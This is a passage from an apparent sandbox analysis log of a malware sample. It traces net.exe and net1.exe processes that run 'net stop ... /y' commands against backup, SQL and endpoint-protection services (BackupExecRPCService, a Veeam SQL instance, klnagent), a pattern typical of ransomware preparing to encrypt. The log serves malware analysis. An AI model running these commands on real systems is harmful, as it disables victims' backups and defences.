lpNumberOfBytesWritten=0x30fa1c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x30fa1c, lpOverlapped=0x0) returned 0 [0198.079] LocalFree (hMem=0x6462c8) returned 0x0 [0198.079] NetApiBufferFree (Buffer=0x641c80) returned 0x0 [0198.079] NetApiBufferFree (Buffer=0x641c98) returned 0x0 [0198.080] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop BackupExecRPCService /y" [0198.080] exit (_Code=2) Process: id = "142" image_name = "net.exe" filename = "c:\\windows\\syswow64\\net.exe" page_root = "0x59b27000" os_pid = "0x958" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0x908" cmd_line = "net stop MSSQL$VEEAMSQL2008R2 /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 315 os_tid = 0x9f0 Process: id = "143" image_name = "net1.exe" filename = "c:\\windows\\syswow64\\net1.exe" page_root = "0x5c223000" os_pid = "0x964" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "142" os_parent_pid = "0x958" cmd_line = "C:\\Windows\\system32\\net1 stop MSSQL$VEEAMSQL2008R2 /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 316 os_tid = 0x8f4 [0198.212] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x24f808 | out: lpSystemTimeAsFileTime=0x24f808*(dwLowDateTime=0x3f54c780, dwHighDateTime=0x1d57a87)) [0198.212] GetCurrentProcessId () returned 0x964 [0198.212] GetCurrentThreadId () returned 0x8f4 [0198.212] GetTickCount () returned 0x116b358 [0198.212] QueryPerformanceCounter (in: lpPerformanceCount=0x24f800 | out: lpPerformanceCount=0x24f800*=31849706609) returned 1 [0198.213] GetModuleHandleA (lpModuleName=0x0) returned 0xa40000 [0198.213] __set_app_type (_Type=0x1) [0198.213] __p__fmode () returned 0x74eb31f4 [0198.213] __p__commode () returned 0x74eb31fc [0198.213] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0xa4ffe6) returned 0x0 [0198.213] __getmainargs (in: _Argc=0xa59064, _Argv=0xa5906c, _Env=0xa59068, _DoWildCard=0, _StartInfo=0xa59024 | out: _Argc=0xa59064, _Argv=0xa5906c, _Env=0xa59068) returned 0 [0198.213] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0198.213] GetConsoleOutputCP () returned 0x1b5 [0198.214] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0xa59080 | out: lpCPInfo=0xa59080) returned 1 [0198.214] SetThreadUILanguage (LangId=0x0) returned 0x409 [0198.217] sprintf_s (in: _DstBuf=0x24f7c0, _DstSize=0xc, _Format=".%u" | out: _DstBuf=".437") returned 4 [0198.217] setlocale (category=0, locale=".437") returned="English_United States.437" [0198.219] GetStdHandle (nStdHandle=0xfffffff5) returned 0x264 [0198.219] GetStdHandle (nStdHandle=0xfffffff4) returned 0x26c [0198.219] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop MSSQL$VEEAMSQL2008R2 /y" [0198.219] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x24f58c, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\net1.exe" (normalized: "c:\\windows\\syswow64\\net1.exe")) returned 0x1c [0198.219] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x7c) returned 0x5e3c20 [0198.219] _wcsnicmp (_String1="/Y", _String2="/y", _MaxCount=0x2) returned 0 [0198.219] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0x24f790 | out: Buffer=0x24f790*=0x5e1c80) returned 0x0 [0198.219] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0x24f790 | out: Buffer=0x24f790*=0x5e1c98) returned 0x0 [0198.219] _fileno (_File=0x74eb2900) returned -2 [0198.219] _setmode (_FileHandle=-2, _Mode=16384) returned -1 [0198.219] _wcsicmp (_String1="accounts", _String2="stop") returned -18 [0198.219] _wcsicmp (_String1="computer", _String2="stop") returned -16 [0198.219] _wcsicmp (_String1="config", _String2="stop") returned -16 [0198.219] _wcsicmp (_String1="continue", _String2="stop") returned -16 [0198.219] _wcsicmp (_String1="cont", _String2="stop") returned -16 [0198.220] _wcsicmp (_String1="file", _String2="stop") returned -13 [0198.220] _wcsicmp (_String1="files", _String2="stop") returned -13 [0198.220] _wcsicmp (_String1="group", _String2="stop") returned -12 [0198.220] _wcsicmp (_String1="groups", _String2="stop") returned -12 [0198.220] _wcsicmp (_String1="help", _String2="stop") returned -11 [0198.220] _wcsicmp (_String1="helpmsg", _String2="stop") returned -11 [0198.220] _wcsicmp (_String1="localgroup", _String2="stop") returned -7 [0198.220] _wcsicmp (_String1="pause", _String2="stop") returned -3 [0198.220] _wcsicmp (_String1="session", _String2="stop") returned -15 [0198.220] _wcsicmp (_String1="sessions", _String2="stop") returned -15 [0198.220] _wcsicmp (_String1="sess", _String2="stop") returned -15 [0198.220] _wcsicmp (_String1="share", _String2="stop") returned -12 [0198.220] _wcsicmp (_String1="start", _String2="stop") returned -14 [0198.220] _wcsicmp (_String1="stats", _String2="stop") returned -14 [0198.220] _wcsicmp (_String1="statistics", _String2="stop") returned -14 [0198.220] _wcsicmp (_String1="stop", _String2="stop") returned 0 [0198.220] _wcsicmp (_String1="accounts", _String2="MSSQL$VEEAMSQL2008R2") returned -12 [0198.220] _wcsicmp (_String1="computer", _String2="MSSQL$VEEAMSQL2008R2") returned -10 [0198.220] _wcsicmp (_String1="config", _String2="MSSQL$VEEAMSQL2008R2") returned -10 [0198.220] _wcsicmp (_String1="continue", _String2="MSSQL$VEEAMSQL2008R2") returned -10 [0198.220] _wcsicmp (_String1="cont", _String2="MSSQL$VEEAMSQL2008R2") returned -10 [0198.220] _wcsicmp (_String1="file", _String2="MSSQL$VEEAMSQL2008R2") returned -7 [0198.220] _wcsicmp (_String1="files", _String2="MSSQL$VEEAMSQL2008R2") returned -7 [0198.220] _wcsicmp (_String1="group", _String2="MSSQL$VEEAMSQL2008R2") returned -6 [0198.220] _wcsicmp (_String1="groups", _String2="MSSQL$VEEAMSQL2008R2") returned -6 [0198.220] _wcsicmp (_String1="help", _String2="MSSQL$VEEAMSQL2008R2") returned -5 [0198.220] _wcsicmp (_String1="helpmsg", _String2="MSSQL$VEEAMSQL2008R2") returned -5 [0198.220] _wcsicmp (_String1="localgroup", _String2="MSSQL$VEEAMSQL2008R2") returned -1 [0198.220] _wcsicmp (_String1="pause", _String2="MSSQL$VEEAMSQL2008R2") returned 3 [0198.220] _wcsicmp (_String1="session", _String2="MSSQL$VEEAMSQL2008R2") returned 6 [0198.220] _wcsicmp (_String1="sessions", _String2="MSSQL$VEEAMSQL2008R2") returned 6 [0198.220] _wcsicmp (_String1="sess", _String2="MSSQL$VEEAMSQL2008R2") returned 6 [0198.220] _wcsicmp (_String1="share", _String2="MSSQL$VEEAMSQL2008R2") returned 6 [0198.220] _wcsicmp (_String1="start", _String2="MSSQL$VEEAMSQL2008R2") returned 6 [0198.220] _wcsicmp (_String1="stats", _String2="MSSQL$VEEAMSQL2008R2") returned 6 [0198.220] _wcsicmp (_String1="statistics", _String2="MSSQL$VEEAMSQL2008R2") returned 6 [0198.220] _wcsicmp (_String1="stop", _String2="MSSQL$VEEAMSQL2008R2") returned 6 [0198.220] _wcsicmp (_String1="time", _String2="MSSQL$VEEAMSQL2008R2") returned 7 [0198.221] _wcsicmp (_String1="user", _String2="MSSQL$VEEAMSQL2008R2") returned 8 [0198.221] _wcsicmp (_String1="users", _String2="MSSQL$VEEAMSQL2008R2") returned 8 [0198.221] _wcsicmp (_String1="msg", _String2="MSSQL$VEEAMSQL2008R2") returned -12 [0198.221] _wcsicmp (_String1="messenger", _String2="MSSQL$VEEAMSQL2008R2") returned -14 [0198.221] _wcsicmp (_String1="receiver", _String2="MSSQL$VEEAMSQL2008R2") returned 5 [0198.221] _wcsicmp (_String1="rcv", _String2="MSSQL$VEEAMSQL2008R2") returned 5 [0198.221] _wcsicmp (_String1="netpopup", _String2="MSSQL$VEEAMSQL2008R2") returned 1 [0198.221] _wcsicmp (_String1="redirector", _String2="MSSQL$VEEAMSQL2008R2") returned 5 [0198.221] _wcsicmp (_String1="redir", _String2="MSSQL$VEEAMSQL2008R2") returned 5 [0198.221] _wcsicmp (_String1="rdr", _String2="MSSQL$VEEAMSQL2008R2") returned 5 [0198.221] _wcsicmp (_String1="workstation", _String2="MSSQL$VEEAMSQL2008R2") returned 10 [0198.221] _wcsicmp (_String1="work", _String2="MSSQL$VEEAMSQL2008R2") returned 10 [0198.221] _wcsicmp (_String1="wksta", _String2="MSSQL$VEEAMSQL2008R2") returned 10 [0198.221] _wcsicmp (_String1="prdr", _String2="MSSQL$VEEAMSQL2008R2") returned 3 [0198.221] _wcsicmp (_String1="devrdr", _String2="MSSQL$VEEAMSQL2008R2") returned -9 [0198.221] _wcsicmp (_String1="lanmanworkstation", _String2="MSSQL$VEEAMSQL2008R2") returned -1 [0198.221] _wcsicmp (_String1="server", _String2="MSSQL$VEEAMSQL2008R2") returned 6 [0198.221] _wcsicmp (_String1="svr", _String2="MSSQL$VEEAMSQL2008R2") returned 6 [0198.221] _wcsicmp (_String1="srv", _String2="MSSQL$VEEAMSQL2008R2") returned 6 [0198.221] _wcsicmp (_String1="lanmanserver", _String2="MSSQL$VEEAMSQL2008R2") returned -1 [0198.221] _wcsicmp (_String1="alerter", _String2="MSSQL$VEEAMSQL2008R2") returned -12 [0198.221] _wcsicmp (_String1="netlogon", _String2="MSSQL$VEEAMSQL2008R2") returned 1 [0198.221] _wcsupr (in: _String="MSSQL$VEEAMSQL2008R2" | out: _String="MSSQL$VEEAMSQL2008R2") returned="MSSQL$VEEAMSQL2008R2" [0198.221] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x80000000) returned 0x5e54f0 [0198.224] GetServiceKeyNameW (in: hSCManager=0x5e54f0, lpDisplayName="MSSQL$VEEAMSQL2008R2", lpServiceName=0xa5aaf0, lpcchBuffer=0x24f72c | out: lpServiceName="", lpcchBuffer=0x24f72c) returned 0 [0198.224] _wcsicmp (_String1="msg", _String2="MSSQL$VEEAMSQL2008R2") returned -12 [0198.224] _wcsicmp (_String1="messenger", _String2="MSSQL$VEEAMSQL2008R2") returned -14 [0198.224] _wcsicmp (_String1="receiver", _String2="MSSQL$VEEAMSQL2008R2") returned 5 [0198.224] _wcsicmp (_String1="rcv", _String2="MSSQL$VEEAMSQL2008R2") returned 5 [0198.224] _wcsicmp (_String1="redirector", _String2="MSSQL$VEEAMSQL2008R2") returned 5 [0198.224] _wcsicmp (_String1="redir", _String2="MSSQL$VEEAMSQL2008R2") returned 5 [0198.224] _wcsicmp (_String1="rdr", _String2="MSSQL$VEEAMSQL2008R2") returned 5 [0198.225] _wcsicmp (_String1="workstation", _String2="MSSQL$VEEAMSQL2008R2") returned 10 [0198.225] _wcsicmp (_String1="work", _String2="MSSQL$VEEAMSQL2008R2") returned 10 [0198.225] _wcsicmp (_String1="wksta", _String2="MSSQL$VEEAMSQL2008R2") returned 10 [0198.225] _wcsicmp (_String1="prdr", _String2="MSSQL$VEEAMSQL2008R2") returned 3 [0198.225] _wcsicmp (_String1="devrdr", _String2="MSSQL$VEEAMSQL2008R2") returned -9 [0198.225] _wcsicmp (_String1="lanmanworkstation", _String2="MSSQL$VEEAMSQL2008R2") returned -1 [0198.225] _wcsicmp (_String1="server", _String2="MSSQL$VEEAMSQL2008R2") returned 6 [0198.225] _wcsicmp (_String1="svr", _String2="MSSQL$VEEAMSQL2008R2") returned 6 [0198.225] _wcsicmp (_String1="srv", _String2="MSSQL$VEEAMSQL2008R2") returned 6 [0198.225] _wcsicmp (_String1="lanmanserver", _String2="MSSQL$VEEAMSQL2008R2") returned -1 [0198.225] _wcsicmp (_String1="alerter", _String2="MSSQL$VEEAMSQL2008R2") returned -12 [0198.225] _wcsicmp (_String1="netlogon", _String2="MSSQL$VEEAMSQL2008R2") returned 1 [0198.225] NetServiceControl (in: servername=0x0, service="MSSQL$VEEAMSQL2008R2", opcode=0x0, arg=0x0, bufptr=0x24f728 | out: bufptr=0x24f728) returned 0x889 [0198.226] wcscpy_s (in: _Destination=0xa5a4e8, _SizeInWords=0x104, _Source="NETMSG" | out: _Destination="NETMSG") returned 0x0 [0198.226] LoadLibraryW (lpLibFileName="NETMSG") returned 0x74a10000 [0198.226] FormatMessageW (in: dwFlags=0x2a00, lpSource=0x74a10000, dwMessageId=0x889, dwLanguageId=0x0, lpBuffer=0xa5b338, nSize=0x800, Arguments=0xa59dd8 | out: lpBuffer="The service name is invalid.\r\n") returned 0x1e [0198.227] GetFileType (hFile=0x26c) returned 0x3 [0198.227] LocalAlloc (uFlags=0x0, uBytes=0x3c) returned 0x5e4020 [0198.228] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="The service name is invalid.\r\n", cchWideChar=30, lpMultiByteStr=0x5e4020, cbMultiByte=60, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="The service name is invalid.\r\n]", lpUsedDefaultChar=0x0) returned 30 [0198.228] WriteFile (in: hFile=0x26c, lpBuffer=0x5e4020, nNumberOfBytesToWrite=0x1e, lpNumberOfBytesWritten=0x24f668, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x24f668, lpOverlapped=0x0) returned 0 [0198.228] LocalFree (hMem=0x5e4020) returned 0x0 [0198.228] GetFileType (hFile=0x26c) returned 0x3 [0198.228] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x5e62c8 [0198.228] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=2, lpMultiByteStr=0x5e62c8, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\n^", lpUsedDefaultChar=0x0) returned 2 [0198.228] WriteFile (in: hFile=0x26c, lpBuffer=0x5e62c8, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x24f668, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x24f668, lpOverlapped=0x0) returned 0 [0198.228] LocalFree (hMem=0x5e62c8) returned 0x0 [0198.228] _ultow (in: _Dest=0x889, _Radix=2422424 | out: _Dest=0x889) returned="2185" [0198.228] FormatMessageW (in: dwFlags=0x2800, lpSource=0x74a10000, dwMessageId=0xdba, dwLanguageId=0x0, lpBuffer=0xa5b338, nSize=0x800, Arguments=0xa59dd8 | out: lpBuffer="More help is available by typing NET HELPMSG 2185.\r\n") returned 0x34 [0198.228] GetFileType (hFile=0x26c) returned 0x3 [0198.228] LocalAlloc (uFlags=0x0, uBytes=0x68) returned 0x5e62c8 [0198.228] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="More help is available by typing NET HELPMSG 2185.\r\n", cchWideChar=52, lpMultiByteStr=0x5e62c8, cbMultiByte=104, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="More help is available by typing NET HELPMSG 2185.\r\n\x04", lpUsedDefaultChar=0x0) returned 52 [0198.228] WriteFile (in: hFile=0x26c, lpBuffer=0x5e62c8, nNumberOfBytesToWrite=0x34, lpNumberOfBytesWritten=0x24f674, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x24f674, lpOverlapped=0x0) returned 0 [0198.228] LocalFree (hMem=0x5e62c8) returned 0x0 [0198.228] GetFileType (hFile=0x26c) returned 0x3 [0198.228] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x5e62c8 [0198.228] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=2, lpMultiByteStr=0x5e62c8, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\n^", lpUsedDefaultChar=0x0) returned 2 [0198.228] WriteFile (in: hFile=0x26c, lpBuffer=0x5e62c8, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x24f674, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x24f674, lpOverlapped=0x0) returned 0 [0198.228] LocalFree (hMem=0x5e62c8) returned 0x0 [0198.229] NetApiBufferFree (Buffer=0x5e1c80) returned 0x0 [0198.229] NetApiBufferFree (Buffer=0x5e1c98) returned 0x0 [0198.229] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop MSSQL$VEEAMSQL2008R2 /y" [0198.229] exit (_Code=2) Process: id = "144" image_name = "net.exe" filename = "c:\\windows\\syswow64\\net.exe" page_root = "0x2552c000" os_pid = "0xa3c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0x908" cmd_line = "net stop klnagent /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 317 os_tid = 0xa44 Process: id = "145" image_name = "net1.exe" filename = "c:\\windows\\syswow64\\net1.exe" page_root = "0x69cc7000" os_pid = "0xa40" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "144" os_parent_pid = "0xa3c" cmd_line = "C:\\Windows\\system32\\net1 stop klnagent /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 318 os_tid = 0xa94 [0198.376] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x1ffce0 | out: lpSystemTimeAsFileTime=0x1ffce0*(dwLowDateTime=0x3f6ef6a0, dwHighDateTime=0x1d57a87)) [0198.376] GetCurrentProcessId () returned 0xa40 [0198.376] GetCurrentThreadId () returned 0xa94 [0198.376] GetTickCount () returned 0x116b404 [0198.376] QueryPerformanceCounter (in: lpPerformanceCount=0x1ffcd8 | out: lpPerformanceCount=0x1ffcd8*=31866061277) returned 1 [0198.376] GetModuleHandleA (lpModuleName=0x0) returned 0xc40000 [0198.376] __set_app_type (_Type=0x1) [0198.376] __p__fmode () returned 0x74eb31f4 [0198.376] __p__commode () returned 0x74eb31fc [0198.376] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0xc4ffe6) returned 0x0 [0198.377] __getmainargs (in: _Argc=0xc59064, _Argv=0xc5906c, _Env=0xc59068, _DoWildCard=0, _StartInfo=0xc59024 | out: _Argc=0xc59064, _Argv=0xc5906c, _Env=0xc59068) returned 0 [0198.377] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0198.377] GetConsoleOutputCP () returned 0x1b5 [0198.377] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0xc59080 | out: lpCPInfo=0xc59080) returned 1 [0198.377] SetThreadUILanguage (LangId=0x0) returned 0x409 [0198.380] sprintf_s (in: _DstBuf=0x1ffc98, _DstSize=0xc, _Format=".%u" | out: _DstBuf=".437") returned 4 [0198.380] setlocale (category=0, locale=".437") returned="English_United States.437" [0198.382] GetStdHandle (nStdHandle=0xfffffff5) returned 0x264 [0198.382] GetStdHandle (nStdHandle=0xfffffff4) returned 0x26c [0198.382] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop klnagent /y" [0198.382] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x1ffa64, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\net1.exe" (normalized: "c:\\windows\\syswow64\\net1.exe")) returned 0x1c [0198.382] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x2d3c00 [0198.383] _wcsnicmp (_String1="/Y", _String2="/y", _MaxCount=0x2) returned 0 [0198.383] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0x1ffc68 | out: Buffer=0x1ffc68*=0x2d1c60) returned 0x0 [0198.383] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0x1ffc68 | out: Buffer=0x1ffc68*=0x2d1c78) returned 0x0 [0198.383] _fileno (_File=0x74eb2900) returned -2 [0198.383] _setmode (_FileHandle=-2, _Mode=16384) returned -1 [0198.383] _wcsicmp (_String1="accounts", _String2="stop") returned -18 [0198.383] _wcsicmp (_String1="computer", _String2="stop") returned -16 [0198.383] _wcsicmp (_String1="config", _String2="stop") returned -16 [0198.383] _wcsicmp (_String1="continue", _String2="stop") returned -16 [0198.383] _wcsicmp (_String1="cont", _String2="stop") returned -16 [0198.383] _wcsicmp (_String1="file", _String2="stop") returned -13 [0198.383] _wcsicmp (_String1="files", _String2="stop") returned -13 [0198.383] _wcsicmp (_String1="group", _String2="stop") returned -12 [0198.383] _wcsicmp (_String1="groups", _String2="stop") returned -12 [0198.383] _wcsicmp (_String1="help", _String2="stop") returned -11 [0198.383] _wcsicmp (_String1="helpmsg", _String2="stop") returned -11 [0198.383] _wcsicmp (_String1="localgroup", _String2="stop") returned -7 [0198.383] _wcsicmp (_String1="pause", _String2="stop") returned -3 [0198.383] _wcsicmp (_String1="session", _String2="stop") returned -15 [0198.383] _wcsicmp (_String1="sessions", _String2="stop") returned -15 [0198.383] _wcsicmp (_String1="sess", _String2="stop") returned -15 [0198.383] _wcsicmp (_String1="share", _String2="stop") returned -12 [0198.383] _wcsicmp (_String1="start", _String2="stop") returned -14 [0198.383] _wcsicmp (_String1="stats", _String2="stop") returned -14 [0198.384] _wcsicmp (_String1="statistics", _String2="stop") returned -14 [0198.384] _wcsicmp (_String1="stop", _String2="stop") returned 0 [0198.384] _wcsicmp (_String1="accounts", _String2="klnagent") returned -10 [0198.384] _wcsicmp (_String1="computer", _String2="klnagent") returned -8 [0198.384] _wcsicmp (_String1="config", _String2="klnagent") returned -8 [0198.384] _wcsicmp (_String1="continue", _String2="klnagent") returned -8 [0198.384] _wcsicmp (_String1="cont", _String2="klnagent") returned -8 [0198.384] _wcsicmp (_String1="file", _String2="klnagent") returned -5 [0198.384] _wcsicmp (_String1="files", _String2="klnagent") returned -5 [0198.384] _wcsicmp (_String1="group", _String2="klnagent") returned -4 [0198.384] _wcsicmp (_String1="groups", _String2="klnagent") returned -4 [0198.384] _wcsicmp (_String1="help", _String2="klnagent") returned -3 [0198.384] _wcsicmp (_String1="helpmsg", _String2="klnagent") returned -3 [0198.384] _wcsicmp (_String1="localgroup", _String2="klnagent") returned 1 [0198.384] _wcsicmp (_String1="pause", _String2="klnagent") returned 5 [0198.384] _wcsicmp (_String1="session", _String2="klnagent") returned 8 [0198.384] _wcsicmp (_String1="sessions", _String2="klnagent") returned 8 [0198.384] _wcsicmp (_String1="sess", _String2="klnagent") returned 8 [0198.384] _wcsicmp (_String1="share", _String2="klnagent") returned 8 [0198.384] _wcsicmp (_String1="start", _String2="klnagent") returned 8 [0198.384] _wcsicmp (_String1="stats", _String2="klnagent") returned 8 [0198.384] _wcsicmp (_String1="statistics", _String2="klnagent") returned 8 [0198.384] _wcsicmp (_String1="stop", _String2="klnagent") returned 8 [0198.384] _wcsicmp (_String1="time", _String2="klnagent") returned 9 [0198.384] _wcsicmp (_String1="user", _String2="klnagent") returned 10 [0198.384] _wcsicmp (_String1="users", _String2="klnagent") returned 10 [0198.384] _wcsicmp (_String1="msg", _String2="klnagent") returned 2 [0198.384] _wcsicmp (_String1="messenger", _String2="klnagent") returned 2 [0198.384] _wcsicmp (_String1="receiver", _String2="klnagent") returned 7 [0198.384] _wcsicmp (_String1="rcv", _String2="klnagent") returned 7 [0198.384] _wcsicmp (_String1="netpopup", _String2="klnagent") returned 3 [0198.384] _wcsicmp (_String1="redirector", _String2="klnagent") returned 7 [0198.384] _wcsicmp (_String1="redir", _String2="klnagent") returned 7 [0198.384] _wcsicmp (_String1="rdr", _String2="klnagent") returned 7 [0198.384] _wcsicmp (_String1="workstation", _String2="klnagent") returned 12 [0198.384] _wcsicmp (_String1="work", _String2="klnagent") returned 12 [0198.384] _wcsicmp (_String1="wksta", _String2="klnagent") returned 12 [0198.385] _wcsicmp (_String1="prdr", _String2="klnagent") returned 5 [0198.385] _wcsicmp (_String1="devrdr", _String2="klnagent") returned -7 [0198.385] _wcsicmp (_String1="lanmanworkstation", _String2="klnagent") returned 1 [0198.385] _wcsicmp (_String1="server", _String2="klnagent") returned 8 [0198.385] _wcsicmp (_String1="svr", _String2="klnagent") returned 8 [0198.385] _wcsicmp (_String1="srv", _String2="klnagent") returned 8 [0198.385] _wcsicmp (_String1="lanmanserver", _String2="klnagent") returned 1 [0198.385] _wcsicmp (_String1="alerter", _String2="klnagent") returned -10 [0198.385] _wcsicmp (_String1="netlogon", _String2="klnagent") returned 3 [0198.385] _wcsupr (in: _String="klnagent" | out: _String="KLNAGENT") returned="KLNAGENT" [0198.385] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x80000000) returned 0x2d54b8 [0198.388] GetServiceKeyNameW (in: hSCManager=0x2d54b8, lpDisplayName="KLNAGENT", lpServiceName=0xc5aaf0, lpcchBuffer=0x1ffc04 | out: lpServiceName="", lpcchBuffer=0x1ffc04) returned 0 [0198.388] _wcsicmp (_String1="msg", _String2="KLNAGENT") returned 2 [0198.388] _wcsicmp (_String1="messenger", _String2="KLNAGENT") returned 2 [0198.388] _wcsicmp (_String1="receiver", _String2="KLNAGENT") returned 7 [0198.388] _wcsicmp (_String1="rcv", _String2="KLNAGENT") returned 7 [0198.388] _wcsicmp (_String1="redirector", _String2="KLNAGENT") returned 7 [0198.388] _wcsicmp (_String1="redir", _String2="KLNAGENT") returned 7 [0198.388] _wcsicmp (_String1="rdr", _String2="KLNAGENT") returned 7 [0198.388] _wcsicmp (_String1="workstation", _String2="KLNAGENT") returned 12 [0198.388] _wcsicmp (_String1="work", _String2="KLNAGENT") returned 12 [0198.388] _wcsicmp (_String1="wksta", _String2="KLNAGENT") returned 12 [0198.388] _wcsicmp (_String1="prdr", _String2="KLNAGENT") returned 5 [0198.388] _wcsicmp (_String1="devrdr", _String2="KLNAGENT") returned -7 [0198.388] _wcsicmp (_String1="lanmanworkstation", _String2="KLNAGENT") returned 1 [0198.389] _wcsicmp (_String1="server", _String2="KLNAGENT") returned 8 [0198.389] _wcsicmp (_String1="svr", _String2="KLNAGENT") returned 8 [0198.389] _wcsicmp (_String1="srv", _String2="KLNAGENT") returned 8 [0198.389] _wcsicmp (_String1="lanmanserver", _String2="KLNAGENT") returned 1 [0198.389] _wcsicmp (_String1="alerter", _String2="KLNAGENT") returned -10 [0198.389] _wcsicmp (_String1="netlogon", _String2="KLNAGENT") returned 3 [0198.389] NetServiceControl (in: servername=0x0, service="KLNAGENT", opcode=0x0, arg=0x0, bufptr=0x1ffc00 | out: bufptr=0x1ffc00) returned 0x889 [0198.390] wcscpy_s (in: _Destination=0xc5a4e8, _SizeInWords=0x104, _Source="NETMSG" | out: _Destination="NETMSG") returned 0x0 [0198.390] LoadLibraryW (lpLibFileName="NETMSG") returned 0x74a80000 [0198.390] FormatMessageW (in: dwFlags=0x2a00, lpSource=0x74a80000, dwMessageId=0x889, dwLanguageId=0x0, lpBuffer=0xc5b338, nSize=0x800, Arguments=0xc59dd8 | out: lpBuffer="The service name is invalid.\r\n") returned 0x1e [0198.391] GetFileType (hFile=0x26c) returned 0x3 [0198.391] LocalAlloc (uFlags=0x0, uBytes=0x3c) returned 0x2d3fe8 [0198.391] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="The service name is invalid.\r\n", 